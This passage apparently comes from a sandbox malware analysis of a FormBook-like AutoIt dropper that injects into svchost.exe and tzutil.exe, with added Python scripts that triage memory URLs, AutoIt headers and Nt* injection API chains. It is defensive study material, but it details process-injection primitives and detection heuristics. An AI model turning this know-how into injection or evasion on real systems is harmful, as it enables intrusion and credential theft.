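    "Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033",
    "Source: tzutil.exe, 0000000B.00000002.3118417486.0000000004F94000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000002.3117680832.0000000003A54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css",
]

# Memory-dump file names as I read them in this report (an assumption of the example):
# <pid>.<run>.<dump id>.<base address>.<page protection>.<...>.<region type>.<...>.sdmp
SRC_RE = re.compile(r"([\w-]+\.exe), ([0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.([0-9A-F]{16})\.([0-9A-F]{8})\.")
PAGE_EXECUTE_READWRITE = 0x40  # Windows page-protection constant

# Host allow-lists are analyst assumptions for this sample, not a reputation feed.
BROWSER_PROFILE_HOSTS = {"ac.ecosia.org", "cdn.ecosia.org", "www.ecosia.org",
                         "ch.search.yahoo.com", "duckduckgo.com"}
MICROSOFT_ACCOUNT_HOSTS = {"login.live.com"}
# cdnjs is referenced by the 404 page body in the HTTP record of this section; the
# other two are assumed to come from the same server error page.
ERROR_PAGE_HOSTS = {"cdnjs.cloudflare.com", "www.litespeedtech.com", "kb.fastpanel.direct"}
# One short alphanumeric directory: the URI shape FormBook panels are known for.
SHORT_DIR_RE = re.compile(r"/[a-z0-9]{2,8}/")


def parse_line(line: str):
    """Return (url, [region dicts]) for one report line."""
    src_part, _, url = line.partition("String found in binary or memory: ")
    regions = [
        {"process": proc, "pid": int(pid, 16), "base": int(base, 16), "protect": int(prot, 16)}
        for proc, pid, base, prot in SRC_RE.findall(src_part)
    ]
    return url.strip(), regions


def classify(url: str, regions: list) -> dict:
    parts = urlsplit(url)
    host = parts.hostname or ""
    if host in BROWSER_PROFILE_HOSTS:
        category = "browser_profile_data"
    elif host in MICROSOFT_ACCOUNT_HOSTS:
        category = "microsoft_account_endpoint"
    elif host in ERROR_PAGE_HOSTS:
        category = "http_error_page_residue"
    else:
        category = "candidate_c2"
    return {
        "url": url,
        "host": host,
        "category": category,
        # A URL sitting in an RWX region of the injected process is the stronger signal.
        "in_rwx_region": any(r["protect"] == PAGE_EXECUTE_READWRITE for r in regions),
        "short_dir_path": bool(SHORT_DIR_RE.fullmatch(parts.path)),
        "processes": sorted({r["process"] for r in regions}),
    }


def triage(lines: list) -> list:
    """Classify every URL line; candidate C2 entries come first."""
    rows = [classify(*parse_line(line)) for line in lines]
    order = {"candidate_c2": 0, "http_error_page_residue": 1,
             "microsoft_account_endpoint": 2, "browser_profile_data": 3}
    return sorted(rows, key=lambda r: (order[r["category"]], r["url"]))


if __name__ == "__main__":
    for row in triage(REPORT_LINES):
        print(f'{row["category"]:28} rwx={row["in_rwx_region"]!s:5} {row["url"]}')
```

The bucket names are a triage aid, not a verdict: a host outside the allow-lists still needs corroboration (here, the RWX region in the injected process and the path shape) before it is treated as C2.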

                E-Banking Fraud

                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3117606831.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1724224119.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3117644043.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3119039119.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1725678953.0000000005150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3114871979.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1725336677.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3117803218.0000000004580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: This is a third-party compiled AutoIt script. 0_2_008F3B3A
                Source: 01152-11-12-24.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 01152-11-12-24.exe, 00000000.00000000.1249973401.00000000009A4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0c594399-5
                Source: 01152-11-12-24.exe, 00000000.00000000.1249973401.00000000009A4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_6a88c564-4
                Source: 01152-11-12-24.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_92302f70-2
                Source: 01152-11-12-24.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_ca152aaa-a
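The marker string matched above is carried by the stub of every AutoIt3-compiled executable, benign or not; the surrounding "runas" and Se*Privilege strings are AutoIt's own RunAs support (the DuplicateTokenEx, LoadUserProfileW and CreateProcessAsUserW sequence further down in this section belongs to the same runtime code). What matters for analysis is the embedded script, so a first triage check should locate it rather than stop at the marker. The script below is an added example, not part of the report: it reports the offsets of the marker and of the well-known AutoIt3 script header (16 magic bytes followed by "AU3!EA06"), and distinguishes a stub with a locatable payload from a stub alone, which is what you see when the script resource is packed or otherwise hidden. The sample buffer is constructed for the example and is not the analysed binary.

```python
import sys

# Plain-text marker present in every AutoIt3-compiled executable's stub; it is the
# string the report matched on.
AUTOIT_MARKER = b"This is a third-party compiled AutoIt script."
# Header of the embedded compiled script: 16 well-known magic bytes followed by the
# "AU3!EA06" format tag.
AU3_HEADER = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D") + b"AU3!EA06"
# Strings that sit next to the marker in the report's memory dump; they belong to
# AutoIt's RunAs implementation and are only used here as corroboration.
RUNAS_STRINGS = [b"runas", b"SeAssignPrimaryTokenPrivilege", b"SeIncreaseQuotaPrivilege"]


def find_all(data: bytes, needle: bytes) -> list:
    """Every offset at which needle occurs in data."""
    offsets, start = [], 0
    while (pos := data.find(needle, start)) != -1:
        offsets.append(pos)
        start = pos + 1
    return offsets


def autoit_indicators(data: bytes) -> dict:
    marker = find_all(data, AUTOIT_MARKER)
    header = find_all(data, AU3_HEADER)
    if marker and header:
        verdict = "compiled_autoit"        # stub plus a locatable script payload
    elif marker:
        verdict = "autoit_stub_only"       # payload packed, encrypted or stripped
    elif header:
        verdict = "au3_payload_only"       # script blob without the usual stub
    else:
        verdict = "none"
    return {
        "marker_offsets": marker,
        "au3_header_offsets": header,
        "runas_strings": [s.decode() for s in RUNAS_STRINGS if s in data],
        "verdict": verdict,
    }


# Constructed stand-in for a compiled AutoIt PE (not the analysed sample): padded MZ
# header, stub strings, then the script header and a few payload bytes.
SAMPLE = (b"MZ" + b"\x00" * 62 + b"AutoIt3GUIContainer\x00"
          + AUTOIT_MARKER + b"\x00runas\x00SeAssignPrimaryTokenPrivilege\x00"
          + b"\x00" * 32 + AU3_HEADER + b"\x11\x22\x33\x44")

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    print(autoit_indicators(data))
```

Run it against a file path to scan a real binary; the header offset is where a decompiler has to start, and "autoit_stub_only" is the cue that the payload needs to be recovered from memory instead.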
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042C9E3 NtClose,7_2_0042C9E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972B60 NtClose,LdrInitializeThunk,7_2_03972B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03972DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039735C0 NtCreateMutant,LdrInitializeThunk,7_2_039735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03974340 NtSetContextThread,7_2_03974340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03974650 NtSuspendThread,7_2_03974650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972B80 NtQueryInformationFile,7_2_03972B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972BA0 NtEnumerateValueKey,7_2_03972BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972BF0 NtAllocateVirtualMemory,7_2_03972BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972BE0 NtQueryValueKey,7_2_03972BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972AB0 NtWaitForSingleObject,7_2_03972AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972AD0 NtReadFile,7_2_03972AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972AF0 NtWriteFile,7_2_03972AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972F90 NtProtectVirtualMemory,7_2_03972F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972FB0 NtResumeThread,7_2_03972FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972FA0 NtQuerySection,7_2_03972FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972FE0 NtCreateFile,7_2_03972FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972F30 NtCreateSection,7_2_03972F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972F60 NtCreateProcessEx,7_2_03972F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972E80 NtReadVirtualMemory,7_2_03972E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972EA0 NtAdjustPrivilegesToken,7_2_03972EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972EE0 NtQueueApcThread,7_2_03972EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972E30 NtWriteVirtualMemory,7_2_03972E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972DB0 NtEnumerateKey,7_2_03972DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972DD0 NtDelayExecution,7_2_03972DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972D10 NtMapViewOfSection,7_2_03972D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972D00 NtSetInformationFile,7_2_03972D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972D30 NtUnmapViewOfSection,7_2_03972D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972CA0 NtQueryInformationToken,7_2_03972CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972CC0 NtQueryVirtualMemory,7_2_03972CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972CF0 NtOpenProcess,7_2_03972CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972C00 NtQueryInformationProcess,7_2_03972C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972C70 NtFreeVirtualMemory,7_2_03972C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972C60 NtCreateKey,7_2_03972C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03973090 NtSetValueKey,7_2_03973090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03973010 NtOpenDirectoryObject,7_2_03973010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039739B0 NtGetContextThread,7_2_039739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03973D10 NtOpenProcessToken,7_2_03973D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03973D70 NtOpenThread,7_2_03973D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03964340 NtSetContextThread,LdrInitializeThunk,11_2_03964340
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03964650 NtSuspendThread,LdrInitializeThunk,11_2_03964650
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_03962BA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03962BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962BE0 NtQueryValueKey,LdrInitializeThunk,11_2_03962BE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962B60 NtClose,LdrInitializeThunk,11_2_03962B60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962AD0 NtReadFile,LdrInitializeThunk,11_2_03962AD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962AF0 NtWriteFile,LdrInitializeThunk,11_2_03962AF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962FB0 NtResumeThread,LdrInitializeThunk,11_2_03962FB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962FE0 NtCreateFile,LdrInitializeThunk,11_2_03962FE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962F30 NtCreateSection,LdrInitializeThunk,11_2_03962F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_03962E80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03962EE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962DD0 NtDelayExecution,LdrInitializeThunk,11_2_03962DD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03962DF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03962D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_03962D30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_03962CA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03962C70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962C60 NtCreateKey,LdrInitializeThunk,11_2_03962C60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039635C0 NtCreateMutant,LdrInitializeThunk,11_2_039635C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039639B0 NtGetContextThread,LdrInitializeThunk,11_2_039639B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962B80 NtQueryInformationFile,11_2_03962B80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962AB0 NtWaitForSingleObject,11_2_03962AB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962F90 NtProtectVirtualMemory,11_2_03962F90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962FA0 NtQuerySection,11_2_03962FA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962F60 NtCreateProcessEx,11_2_03962F60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962EA0 NtAdjustPrivilegesToken,11_2_03962EA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962E30 NtWriteVirtualMemory,11_2_03962E30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962DB0 NtEnumerateKey,11_2_03962DB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962D00 NtSetInformationFile,11_2_03962D00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962CC0 NtQueryVirtualMemory,11_2_03962CC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962CF0 NtOpenProcess,11_2_03962CF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962C00 NtQueryInformationProcess,11_2_03962C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03963090 NtSetValueKey,11_2_03963090
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03963010 NtOpenDirectoryObject,11_2_03963010
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03963D10 NtOpenProcessToken,11_2_03963D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03963D70 NtOpenThread,11_2_03963D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030B9720 NtClose,11_2_030B9720
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030B9680 NtDeleteFile,11_2_030B9680
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030B9590 NtReadFile,11_2_030B9590
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030B9420 NtCreateFile,11_2_030B9420
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030B9890 NtAllocateVirtualMemory,11_2_030B9890
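Read together, the Nt* functions above are the raw material for the injection findings: opening a target (NtOpenProcess, NtOpenThread), allocating and mapping memory (NtAllocateVirtualMemory, NtCreateSection, NtMapViewOfSection), writing it (NtWriteVirtualMemory), making it executable (NtProtectVirtualMemory) and starting execution (NtQueueApcThread, NtSetContextThread, NtResumeThread). Two details are worth noting. First, the functions are resolved at addresses in 0x0397xxxx (svchost.exe) and 0x0396xxxx (tzutil.exe) rather than inside an ntdll image, which is consistent with the malware calling a privately mapped copy of ntdll. Second, tzutil.exe has a second, separate set of stubs at 0x030B9xxx, so the same primitive (NtAllocateVirtualMemory) is reachable from two places. The script below is an added example, not report output: it parses lines in the report's layout, skips the LdrInitializeThunk annotations and the repeated trailing address, and scores each process against an analyst mapping of primitives to injection stages and techniques. The stage and technique tables are assumptions of the example, and PID 9 is an invented negative control that does not appear in the report.

```python
import re

# Constructed subset of the "Code function:" lines above, in the report's own layout
# (source path fused to the label, address, comma-separated calls, address repeated).
# PID 7 is svchost.exe and PID 11 is tzutil.exe as in the report; PID 9 is an invented
# negative control that is NOT in the report.
REPORT_LINES = [
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972B60 NtClose,LdrInitializeThunk,7_2_03972B60",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03974340 NtSetContextThread,7_2_03974340",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03974650 NtSuspendThread,7_2_03974650",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972BF0 NtAllocateVirtualMemory,7_2_03972BF0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972F90 NtProtectVirtualMemory,7_2_03972F90",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972FB0 NtResumeThread,7_2_03972FB0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972F30 NtCreateSection,7_2_03972F30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972EE0 NtQueueApcThread,7_2_03972EE0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972E30 NtWriteVirtualMemory,7_2_03972E30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972D10 NtMapViewOfSection,7_2_03972D10",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972D30 NtUnmapViewOfSection,7_2_03972D30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972CF0 NtOpenProcess,7_2_03972CF0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039739B0 NtGetContextThread,7_2_039739B0",
    r"Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03964340 NtSetContextThread,LdrInitializeThunk,11_2_03964340",
    r"Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03964650 NtSuspendThread,LdrInitializeThunk,11_2_03964650",
    r"Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03962BF0",
    r"Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962F30 NtCreateSection,LdrInitializeThunk,11_2_03962F30",
    r"Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03962EE0",
    r"Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03962D10",
    r"Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962FB0 NtResumeThread,LdrInitializeThunk,11_2_03962FB0",
    r"Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962F90 NtProtectVirtualMemory,11_2_03962F90",
    r"Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962E30 NtWriteVirtualMemory,11_2_03962E30",
    r"Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962CF0 NtOpenProcess,11_2_03962CF0",
    r"Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030B9680 NtDeleteFile,11_2_030B9680",
    r"Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030B9890 NtAllocateVirtualMemory,11_2_030B9890",
    r"Source: C:\Windows\System32\notepad.exeCode function: 9_2_00401000 NtClose,NtReadFile,9_2_00401000",
]

LINE_RE = re.compile(
    r"Source: (?P<src>.*?)Code function: (?P<pid>\d+)_\d+_(?P<addr>[0-9A-Fa-f]{8}) (?P<calls>.+)$"
)

# Analyst mapping (an assumption of this example) of Nt* primitives to the stages of a
# remote-process injection; a stage counts as covered if any listed call is present.
INJECTION_STAGES = [
    ("open_target", {"NtOpenProcess", "NtOpenThread", "NtCreateProcessEx"}),
    ("allocate", {"NtAllocateVirtualMemory", "NtCreateSection"}),
    ("write", {"NtWriteVirtualMemory", "NtMapViewOfSection"}),
    ("make_executable", {"NtProtectVirtualMemory", "NtMapViewOfSection"}),
    ("execute", {"NtQueueApcThread", "NtSetContextThread", "NtResumeThread"}),
]
# Each technique is a list of "any of" groups that must all be satisfied.
TECHNIQUES = {
    "apc_injection": [{"NtOpenProcess", "NtOpenThread"}, {"NtWriteVirtualMemory", "NtMapViewOfSection"}, {"NtQueueApcThread"}],
    "thread_context_hijack": [{"NtSuspendThread"}, {"NtSetContextThread"}, {"NtResumeThread"}],
    "section_mapping": [{"NtCreateSection"}, {"NtMapViewOfSection"}],
}


def parse_report(lines: list) -> dict:
    """pid -> {"process": name, "nt_apis": {api: [addresses]}}."""
    procs = {}
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        entry = procs.setdefault(int(m["pid"]), {"process": m["src"].rsplit("\\", 1)[-1], "nt_apis": {}})
        for call in m["calls"].split(","):
            if call.startswith("Nt"):   # drops LdrInitializeThunk and the trailing address
                entry["nt_apis"].setdefault(call, []).append(int(m["addr"], 16))
    return procs


def assess(entry: dict) -> dict:
    present = set(entry["nt_apis"])
    stages = [name for name, any_of in INJECTION_STAGES if present & any_of]
    techniques = [name for name, groups in TECHNIQUES.items() if all(present & g for g in groups)]
    addresses = [a for addrs in entry["nt_apis"].values() for a in addrs]
    return {
        "process": entry["process"],
        "nt_api_count": len(present),
        "stages": stages,
        "complete_chain": len(stages) == len(INJECTION_STAGES),
        "techniques": techniques,
        # 64 KiB blocks the stubs live in; more than one block means separate stub sets.
        "stub_regions": sorted({f"0x{a >> 16:04X}" for a in addresses}),
        "multi_region_apis": sorted(api for api, addrs in entry["nt_apis"].items()
                                    if len({a >> 16 for a in addrs}) > 1),
    }


def triage(lines: list) -> dict:
    return {pid: assess(entry) for pid, entry in parse_report(lines).items()}


if __name__ == "__main__":
    for pid, verdict in sorted(triage(REPORT_LINES).items()):
        print(pid, verdict)
```

The stage table is deliberately coarse: a complete chain in one process is a strong static hint, but the sandbox's dynamic findings (which process wrote into which) are what confirm it.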
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0095A1EF
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00948310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00948310
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009551BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009551BD
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008FE6A0
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0091D975
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008FFCE0
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009121C5
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009262D2
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009703DA
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0092242E
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009125FA
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009066E1
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0094E616
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0092878F
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00958889
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00908808
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00970857
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00926844
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0091CB21
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00926DB6
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00906F9E
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00903030
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00913187
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0091F1D9
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008F1287
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00911484
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00905520
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00917696
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00905760
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00911978
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00929AB5
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00911D90
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0091BDA6
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00977DDB
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00903FE0
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008FDF00
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_01416470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00418903
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00403050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042F083
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00410163
